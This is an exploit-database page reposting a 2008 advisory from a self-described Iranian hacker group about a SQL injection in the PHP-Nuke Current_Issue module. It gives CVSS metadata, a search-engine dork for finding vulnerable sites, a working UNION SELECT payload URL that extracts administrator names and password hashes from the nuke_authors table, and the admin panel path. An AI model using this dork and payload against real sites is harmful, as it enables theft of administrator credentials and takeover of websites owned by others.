Advertisement






PHP-Nuke Module Current_Issue (summary&id) Remote SQL injection Vulnerability

CVE Category Price Severity
N/A CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') N/A High
Author Risk Exploitation Type Date
N/A High Remote 2008-10-31
CPE
cpe:Not available
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.00014 0.455

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008100084

Below is a copy:

  ###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## PHP-Nuke  Module Current_Issue (summary&id)
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.only-4dl.tk
##
## Email  : Ehsan_Hp200_at_Hotmail.com
##     
##
#############################

##

Dork :  "inurl:modules.php?name=Current_Issue"

 Exploite:

www.victim.com/modules.php?name=Current_Issue&d_op=summary&id=-1+union+select+1,2,3,aid,5,6,pwd,Null,Null+from+nuke_authors--


###############################################################################
Admin Panel: www.victim.com/admin.php
,##############################################################################
special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , Dj7xpl , ONLY3250 , Jasoos Team ,Enigma2


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.